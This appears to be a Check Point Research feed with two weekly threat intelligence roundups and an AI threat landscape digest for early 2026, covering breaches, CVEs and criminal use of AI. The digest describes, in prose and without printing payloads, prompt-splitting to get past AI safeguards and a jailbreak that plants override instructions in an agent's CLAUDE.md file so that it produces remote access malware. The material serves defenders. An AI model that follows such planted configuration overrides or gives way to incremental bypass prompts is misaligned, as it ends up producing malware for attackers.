The post ChatGPT Data Leakage via a Hidden Outbound Channel in the Code Execution Runtime appeared first on Check Point Research.

30th March – Threat Intelligence Report

By: urias
30 March 2026 at 14:53

For the latest discoveries in cyber research for the week of 30th March, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • Iranian state-affiliated threat group Handala Hack has breached FBI director’s Patel’s personal Gmail account and leaked many personal photos and documents. This follows the FBI’s seizure of domains related to Handala Hack’s activity last week, due to the group’s sustained targeting of Israeli and American entities, which increased during the ongoing Iran conflict.
  • Spain’s Port of Vigo in Galicia has suffered a ransomware attack that forced officials to disconnect parts of its network and switch cargo handling to manual processes. The incident locked equipment and disrupted digital logistics, while physical ship movement could continue without digital communication.
  • The Netherlands’ Ministry of Finance has confirmed a March 19 cyberattack that breached internal systems in its policy department and disrupted work for some employees. Authorities blocked access to affected environments, while tax, customs, and benefits services remained unaffected and no threat actor publicly claimed responsibility for the attack.
  • Decentralized finance platform Resolv has suffered a cyberattack after a compromised private key let an attacker mint about $80 million in uncollateralized USR tokens and swap them for 11,408 ETH worth $24.5 million. Resolv confirmed the incident, paused the app, and offered a 10% bounty for returned funds.

AI THREATS

  • Researchers demonstrated a supply chain compromise of LiteLLM, a Python library linking apps to major AI services, after attackers hijacked a security tool and pushed malicious releases on March 24. The tainted packages harvested API keys and cloud credentials, creating downstream exposure for widely used AI projects.
  • Researchers outlined three high-severity vulnerabilities in LangChain and LangGraph, open-source frameworks for building AI assistants, that could expose files, environment secrets, and prior conversations. The flaws enabled arbitrary file access, secret leakage, and SQL injection in checkpointing, and patches were issued in updated components.
  • Researchers identified a zero-click flaw in Anthropic’s Claude Chrome extension that let any website silently inject prompts and control the assistant. The attack combined an overly permissive trusted domain list with a scripting bug in Arkose Labs CAPTCHA handling, enabling token theft, chat access, and email actions.

VULNERABILITIES AND PATCHES

  • Cisco has addressed CVE-2026-20131, a CVSS 10 vulnerability in Secure Firewall Management Center that lets unauthenticated attackers execute code as root through the web interface. Cisco confirmed attempted exploitation in March 2026 and released fixes, while on-premises customers have no workaround beyond applying the updates.

Check Point IPS provides protection against this threat (Cisco Secure Firewall Management Center Insecure Deserialization (CVE-2026-20131))

  • TP-Link has issued firmware updates addressing CVE-2025-15517 and related critical flaws in Archer NX200, NX210, NX500, and NX600 5G Wi-Fi routers. Attackers could access administrative functions without logging in, upload rogue firmware, execute system commands, and more.
  • Citrix has released patches for CVE-2026-3055 and CVE-2026-4368 affecting NetScaler ADC and Gateway. The critical memory flaw can expose sensitive data in SAML Identity Provider deployments, while the second bug can mix up user sessions on gateways, creating confidentiality and access risks.

Check Point IPS provides protection against this threat (Citrix NetScaler Out Of Bounds Read (CVE-2026-3055))

  • Researchers warn that a leaked ‘DarkSword’ iOS exploit chain enables no-click attacks via Safari, threatening up to 270 million unpatched iPhones and iPads. The code eases copycat attacks and has seen use, while Apple issued fixes, including March 11 emergency updates for iOS 15 and 16.

THREAT INTELLIGENCE REPORTS

  • Researchers revealed that cybercriminals are abusing Keitaro, a commercial adtech tracker, to distribute phishing, scams, and malware at scale. Infoblox linked the platform to major malvertising and spam operations, including campaigns impersonating Canadian banks, logistics brands, government services, and high-trust retail providers.
  • Researchers analyzed three China-aligned activity clusters targeting a Southeast Asian government in a coordinated espionage operation. The campaign combined USB propagation, the Hypnosis loader, and the FluffyGh0st RAT, showing how distinct threat clusters can converge on one high-value government target with complementary tooling.
  • Researchers have analyzed the activity of Russian threat group APT28 (aka Fancy Bear). The group has recently targeted Ukraine as well as its European defense supply chain partners with a toolset dubbed PRIXMES, which holds both espionage and sabotage capabilities. APT28 exploited multiple vulnerabilities, including zero-days, in its attacks.
  • Researchers identified a coordinated adversary-in-the-middle phishing campaign targeting TikTok for Business users who sign in with Google. Attackers deployed proxy login pages that captured passwords and session cookies to bypass multi-factor authentication, with newly registered domains and Cloudflare-hosted infrastructure used to scale impersonation.

The post 30th March – Threat Intelligence Report appeared first on Check Point Research.

AI Threat Landscape Digest January-February 2026

29 March 2026 at 12:08

KEY FINDINGS

AI-assisted malware development has reached operational maturity.
VoidLink framework, which is modular, professionally engineered, and fully functional, was built by a single developer using a commercial AI-powered IDE within a compressed timeframe. AI-assisted development is no longer experimental but produces deployment ready output.

AI-assisted development is not always obvious from the final product.
VoidLink was initially assessed as the work of a coordinated team based on its architecture and implementation quality. The development method was exposed not from analyzing the malware but through an operational security failure. AI-assisted development should be considered a possibility from the outset, not as an afterthought.

Adoption of self-hosted, open-source AI models is growing but still limited in practice.
Actors of varying skill levels are investing in self-hosted and unrestricted models to avoid commercial platform restrictions. However, underground discussions consistently reveal a gap between aspiration and capability: local models still underperform, finetuning remains aspirational, and commercial models remain the productive choice even for actors with explicit malicious intent.

Jailbreaking is shifting from direct prompt engineering toward agenticarchitecture abuse.
Traditional copy-paste jailbreaks are increasingly ineffective. The misuse of AI agent configuration mechanisms, specifically project files that redefine agent behavior, is a more significant development as it represents a qualitative shift from manipulating a
model’s responses to abusing its operational architecture.

AI is showing early signs of deployment as a real-time operational component. Beyond its use as a development aid, AI is beginning to appear as a live element in offensive workflows as autonomous agents performing security research tasks, and
LLMs classifying and engaging targets at scale within automated pipelines.

Enterprise AI adoption is itself an expanding attack surface.
GenAI activity across enterprise networks shows that one in every 31 prompts risked sensitive data leakage, impacting 90% of GenAI-adopting organizations.

INTRODUCTION

During January-February 2026, cyber crime ecosystems continue to adopt AI in a widespread but uneven pattern. Throughout 2025, legitimate software development began shifting from promptbased AI assistance to agent-based development. Tools such as Cursor, GitHub Copilot, Claude Code, and TRAE introduced a common paradigm: developers write structured specifications in markdown files, and AI agents autonomously implement, test, and iterate code based on those instructions. This agentic model, in which markdown is the operative control layer, is now starting to appear across the threat landscape.


The critical differentiator in what we observed is AI methodology combined with domain expertise. Across cyber crime forums, the dominant pattern of AI use remains unstructured prompting: actors request malware or exploit code from AI models as if entering a query in a search engine. VoidLink (detailed below) on the other hand, is the first documented case of AI producing truly advanced, deploymentready malware. The developer combined deep security knowledge with a disciplined, spec-driven
workflow to produce results indistinguishable from professional team-based engineering. Forum activity, which constitutes the bulk of observable evidence, primarily consists of actors who have not yet adopted structured AI workflows and whose efforts remain relatively unsophisticated. The more capable actors, those who combine domain expertise with disciplined AI methodology, leave far fewer traces in open forums, making the true scope of this shift harder to measure.

VOIDLINK: THE STANDARD WE MEASURE AGAINST

In January 2026, Check Point Research (CPR) exposed VoidLink, a Linux-based malware framework featuring modular command-and-control (C2) architecture, eBPF and LKM rootkits, cloud and container enumeration, and more than 30 post-exploitation plugins. The framework is highly sophisticated and professionally engineered, so much so that the initial assessment was that VoidLink was likely the product of a coordinated, multi-person development effort conducted over months of intensive development.


Operational security (OPSEC) failures by the developer later exposed internal development artifacts that told a different story. These materials revealed that VoidLink was authored by a single developer using TRAE SOLO, the paid tier of ByteDance’s commercial AI-powered IDE. Instead of unstructured prompting, the developer used Spec Driven Development (SDD), a disciplined engineering workflow, to first define the project goals and constraints, and then use an AI agent to generate a comprehensive architecture and development plan across three virtual teams (Core, Arsenal, and Backend). The resulting plan included sprint schedules, feature breakdowns, coding standards, and acceptance criteria, all documented as structured markdown files. The AI agent implemented the framework sprint by sprint, with each sprint producing working, testable code. The developer acted as product owner, directing, reviewing, and refining, while the AI agent did the actual work.


The results were striking. The recovered source code aligned so closely with the specification documents that it left little doubt that the codebase was written to those exact instructions. What normally would have been a 30-week engineering effort across three teams was executed in under a week, producing over 88,000 lines of functional code. VoidLink reached its first functional implant around December 4, 2025, one week after development began.

THIS CASE ESTABLISHES TWO PRINCIPLES:

  • AI-assisted development now produces operationally viable, deployment-ready malware: it has crossed the threshold from experimental to functional.
  • The AI involvement was invisible until it was exposed by an unrelated OPSEC failure. For analysts and defenders, this means AI involvement in malware development should be treated as a default working assumption, even when there are no visible indicators

The ramifications of VoidLink’s methodology go beyond this individual case. Its workflow, in which structured markdown specifications direct an AI agent to autonomously implement, test, and iterate, is the same paradigm that defined the agentic AI revolution in legitimate software development throughout 2025. The cyber crime ecosystem is not developing its own AI capability. It is adopting the same tools and architectural patterns as legitimate technology, with the additional goal of trying to overcome the protective limitations built into these systems. This is more important than which model or platform the attackers use.

The same architectural pattern repeatedly appears across the cases highlighted in our report: markdown skill files that transform a coding agent into an autonomous offensive security operator, and configuration files abused to override agent safety controls. In each case, the operative control layer is not code but structured documentation that determines what the AI agents build, how they behave, and what constraints they observe or ignore. This is in direct contrast to the underground forum activity, where the dominant approach remains unstructured prompting.

MODELS: COMMERCIAL, SELF-HOSTED, AND INFORMAL SERVICES

SELF-HOSTED OPEN-SOURCE MODELS

Across cyber crime forums, actors at all skill levels are actively exploring self-hosted, open-source AI models as alternatives to commercial platforms. Their motivations are consistent: to avoid moderation, prevent account bans, and maintain operational privacy.

Users with malware and hacking backgrounds are installing uncensored model variants such as wizardlm-33b-v1.0-uncensored and openhermes-2.5-mistral, and prompt them with comprehensive malicious wishlists spanning ransomware, keyloggers, phishing kits, and exploit code.

Figure 1 – User installing local LLM variants and prompting them to generate malware and fraud tooling.

More established actors are conducting structured cost-benefit analyses, evaluating not only hardware requirements and GPU costs but whether locally hosted models produce reliable output (or hallucinate to the point of being operationally useless), and whether AI-generated malware meets the quality bar of current evasion techniques.

Figure 2 – Threat actor inquiry into hardware, cost, and feasibility of running a fully “unrestricted” locally hosted model.

SELF-HOSTED MODELS: LIMITATIONS IN PRACTICE

Self-hosted models consistently show a gap between aspiration and capability. Community advice on improving local model output focuses on basic optimizations, such as switching to English-language prompts and increasing quantization levels, while references to more advanced techniques such as LoRA fine-tuning remain aspirational rather than operational.

Figure 3 – Community feedback suggesting alternative local models and highlighting token/context limitations of smaller deployments.

Cost estimates range from $5,000 to $50,000 depending on the desired performance, with training timelines of 3–12 months and frank admissions that models “hallucinate a lot” without extensive investment.

Figure 4 – Discussion on cost and requirements for locally hosted unrestricted models.

Most tellingly, an active offensive tools vendor, advertising C2 setups, EDR bypass services, and red team tooling, concluded that local deployment is currently “more of a burden than something productive,” while acknowledging that commercial models remain useful despite increasing restrictions.

Figure 5 – Participants comparing commercial AI systems with alternative models and discussing perceived restriction levels.

COMMERCIAL PLATFORMS AND INFORMAL ACCESS SHARING

Rather than migrating to self-hosted infrastructure, users are comparing what the prevailing workarounds among commercial models provide. Participants recommended specific providers they view as less restrictive, shared experiences with account enforcement on multiple platforms, and refined prompt-splitting techniques to incrementally bypass safeguards, such as requesting explanations before progressing toward executable code.

Figure 6 – Example of the structured prompt-splitting technique suggested to incrementally bypass AI safety restrictions.

Some early signs of informal access sharing have been observed, with operators of local models offering to generate restricted outputs for others on request. However, given the historical precedent of “dark LLM” services that largely failed to deliver on their promises, it remains to be seen whether these will develop into durable service models.

Figure 7 – Community member offering private generation of restricted output via locally hosted model infrastructure.

JAILBREAKING AS ARCHITECTURAL ABUSE

Traditional jailbreaking, the practice of circulating copy‑paste prompts designed to trick models into producing restricted output, is becoming increasingly difficult to utilize. In some forum discussions, users seeking Claude jailbreaks were told that easy public prompts are no longer available, platforms have been cracking down on abusers, dedicated subreddits have been banned, and developing new jailbreaks is costly because the accounts are eventually terminated. Single‑prompt jailbreaking is becoming less attractive as model providers invest in safety enforcement.

Figure 8 – Forum discussion highlighting the declining availability of easy public jailbreak prompts.

ABUSING AGENT ARCHITECTURE

A more significant development is the emergence of jailbreaking techniques that target the architecture of AI agent systems rather than the model’s conversational safeguards. A packaged “Claude Code Jailbreak” distributed on forums illustrates this shift.

Claude Code is designed to read a CLAUDE.md file from a project’s root directory as configuration. Legitimate developers use this mechanism to define the project context, coding standards, and agent behavior. The jailbreak abuses this by placing override instructions in the CLAUDE.md file that suppresses safety controls and redefines the agent’s role. When Claude Code initializes in the directory, it reads these instructions as authoritative project configuration and follows them. The screenshots below claim successful generation of a RAT (Remote Access Trojan) using this method.

Figure 9 – Packaged Claude Code jailbreak exploiting the CLAUDE.md project configuration mechanism.
Figure 10 – Alleged jailbreak output showing generation of remote access malware code.

This is not prompt injection in the traditional sense, but manipulation of the agent’s instruction hierarchy, the same architecture used for agentic AI tools in legitimate development. The CLAUDE. md file occupies the same functional role as VoidLink’s markdown specification files or RAPTOR’s skill definitions: a structured document that determines what the agent does, how it behaves, and what constraints it observes.

FROM DEVELOPMENT TOOL TO OPERATIONAL AGENT

The preceding sections document AI as a development aid (as seen by VoidLink), a resource actors struggle to access on their own terms (self-hosted models), and as a system whose restrictions they attempt to bypass (jailbreaking). Now let’s look at AI deployed as a real-time operational component, performing offensive tasks autonomously within live workflows.

RAPTOR: AGENT-BASED OFFENSIVE ARCHITECTURE VIA MARKDOWN SKILLS

RAPTOR is a legitimate, open-source security research framework created by established security researchers and published on GitHub under an MIT license. It is not malicious tooling. Its significance for threat intelligence lies in its architectural pattern, and that criminal communities are paying attention.

RAPTOR transforms Claude Code into an autonomous offensive security agent through a set of markdown skill files and agent definitions. The framework integrates static analysis, fuzzing, exploit generation, and vulnerability triage into an agentic pipeline orchestrated entirely through structured markdown instructions, with no compiled tooling required. In its most explicit form, it demonstrates what the agentic paradigm makes possible: a set of text files that turn a general‑purpose coding agent into a specialized offensive security operator.

Figure 11 – RAPTOR documentation highlighting offensive security agent capabilities and exploit generation benchmarks across LLM providers.

RAPTOR’s own data provides an additional data point on the commercial versus self-hosted question we discussed earlier. An evaluation of exploit generation across multiple model providers found that commercial frontier models (Anthropic Claude, OpenAI GPT-4, and Google Gemini) consistently produce compilable C code at approximately $0.03 per vulnerability, while locally hosted models via Ollama were marked as “often broken” and unreliable for exploit generation. This reinforces the conclusion reached independently by experienced actors in underground forums: commercial models remain significantly more capable than self-hosted alternatives for operational tasks.

Figure 12 – Forum post sharing RAPTOR as an autonomous offensive and defensive security framework built on Claude Code.

Discussions on criminal forums indicate that threat actors are aware of this architecture. The combination of a proven architectural pattern, open source availability, and documented criminal interest suggests that similar configurations, whether directly based on RAPTOR or just replicating its approach, are likely being developed and tested privately.

AI AS ATTACK SURFACE: ENTERPRISE EXPOSURE

The preceding sections document how threat actors engage with AI as an offensive tool. But the same wave of AI adoption is simultaneously creating exposure from the defensive side. As enterprises integrate generative AI into daily workflows, the volume of sensitive data flowing through these tools introduces a distinct category of risk: instead of AI weaponized against organizations, AI is adopted by organizations in ways that outpace security controls.

In January – February 2026, corporate use of generative AI tools continued to expand at scale. Analysis of GenAI activity across enterprise networks shows that one in every 31 prompts (approximately 3.2%) posed a high risk of sensitive data leakage, including the potential sharing of confidential business information, regulated data, source code, or other sensitive corporate content with external GenAI services.

Critically, this risk is broadly distributed across the enterprise landscape rather than limited to a small number of outliers. High-risk prompt activity impacted 90% of organizations that use GenAI tools on a regular basis, indicating that nearly all GenAI-adopting enterprises encounter meaningful data leakage risk through everyday AI usage. Beyond these clearly high-risk events,16% of prompts contained potentially sensitive information, reflecting a wider pattern of questionable data-handling behavior that can still translate into compliance exposure or IP loss.

Adoption trends further amplify the challenge. Over the last couple of months, organizations used 10 different GenAI tools on average, reflecting multi-tool environments. At the user level, an average employee generated 69 GenAI prompts per month. As prompt volume grows, the possibility of data exposure events scales accordingly, reinforcing the need for security policies, visibility, and real-time prevention controls.

The post AI Threat Landscape Digest January-February 2026 appeared first on Check Point Research.

23rd March – Threat Intelligence Report

By: urias
23 March 2026 at 14:38

For the latest discoveries in cyber research for the week of 23rd March, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • Navia Benefit Solutions, a United States-based employee benefits administrator, has disclosed a breach affecting more than 2.6 million individuals after unauthorized access and potential data exfiltration occurred between December 22, 2025 and January 15, 2026. Exposed information may include personal, health, and benefits data.
  • Identity protection firm Aura was breached after a phone phishing attack let an intruder access an employee account and a marketing platform. The actor obtained about 900,000 records, mostly names and emails, while the core systems and identity protection services were not compromised.
  • Puerto Rico Aqueduct and Sewer Authority, which manages the territory’s water supply, has confirmed a cyberattack that exposed customer and employee information. The authority said critical infrastructure was not affected because network segmentation separated operational systems, limiting the incident to business data and administrative environments.
  • Intuitive, a United States-based robotic surgery company, has suffered a data breach after a targeted phishing incident led to a compromised employee account. Exposed information includes customer contact details, employee data, and corporate records, while the company said its da Vinci and Ion platforms were unaffected.

AI THREATS

  • Check Point Research highlighted the key developments and major trends in the AI threat ecosystem during January – February 2026. The report focuses on the transition to the agentic era by the threat actors, where development is shifting from simple prompting to structured workflows, attack chains are evolving from human-led to AI-led operations, and safeguard bypass techniques are increasingly beginning to exploit agent mechanisms.
  • Researchers have discovered three chained flaws in Anthropic’s Claude.ai, enabling invisible prompt injection, silent exfiltration of conversation history through the Files API, and redirection through an open redirect. Anthropic patched the injection issue and is addressing the remaining weaknesses, while the chain enables stealthy data theft.
  • Researchers have witnessed exploitation of CVE-2026-33017, a critical unauthenticated remote code execution flaw in Langflow, an open-source framework for AI agents and retrieval-augmented generation pipelines. Attackers weaponized the bug within 20 hours of disclosure, allowing arbitrary Python execution on exposed instances through a single crafted request.

Check Point IPS provides protection against this threat (Langflow Remote Code Execution (CVE-2026-33017))

VULNERABILITIES AND PATCHES

  • ConnectWise has patched CVE-2026-3564, a critical cryptographic signature verification flaw in ScreenConnect, its remote access platform used by managed service providers and IT teams. The issue could let attackers use extracted machine keys to authenticate sessions without authorization and gain elevated privileges on affected instances
  • Ubiquiti has addressed CVE-2026-22557, a maximum-severity flaw in the UniFi Network Application used to manage access points, switches, and gateways. The unauthenticated path traversal bug affects version 10.1.85 and earlier and can let attackers access files, compromise accounts, and potentially seize control of underlying systems.
  • Zimbra warns of active exploitation of CVE-2025-66376, a stored cross-site scripting flaw in Zimbra Collaboration Suite that was recently patched. Malicious emails can execute code when viewed in the Classic UI, exposing session cookies and mailbox data, while patched versions include 10.1.13 and 10.0.18, following warnings about real-world abuse.
  • GNU InetUtils telnetd is affected by CVE-2026-32746, a CVSS 9.8 remote code execution flaw impacting all versions up to 2.7. Attackers can trigger the issue with a single Telnet connection without logging in, potentially gaining root control on exposed Linux, IoT, and industrial systems before a patch arrives.

Check Point IPS provides protection against this threat (GNU inetutils Buffer Overflow (CVE-2026-32746))

THREAT INTELLIGENCE REPORTS

  • Check Point researchers have analyzed recent developments in the Telegram cybercrime scene, after the company had bolstered its moderation tools due to extensive criticism of allowing criminal behavior. Data shows that despite Telegram’s efforts, it is still the primary platform for cybercrime communication, with activity only growing.
  • Researchers identified an Interlock ransomware campaign exploiting CVE-2026-20131, a critical flaw in Cisco Secure Firewall Management Center that enables remote code execution. The group used the zero-day as early as January, several weeks before it was patched and publicly disclosed by Cisco.
  • Researchers revealed that two React Native npm packages, react-native-country-select and react-native-international-phone-number, were backdoored on March 16, 2026, in a coordinated supply-chain attack. A preinstall script deployed credential and crypto theft malware with persistence, while the packages recorded over 130,000 combined downloads over the previous month.
  • Researchers have published a threat assessment of MuddyWater, linking the Iranian APT group to spear-phishing and LampoRAT. The report details delivery infrastructure, command-and-control patterns, and victimology.

Check Point Harmony Endpoint and Threat Emulation provide protection against these threats

 

The post 23rd March – Threat Intelligence Report appeared first on Check Point Research.

❌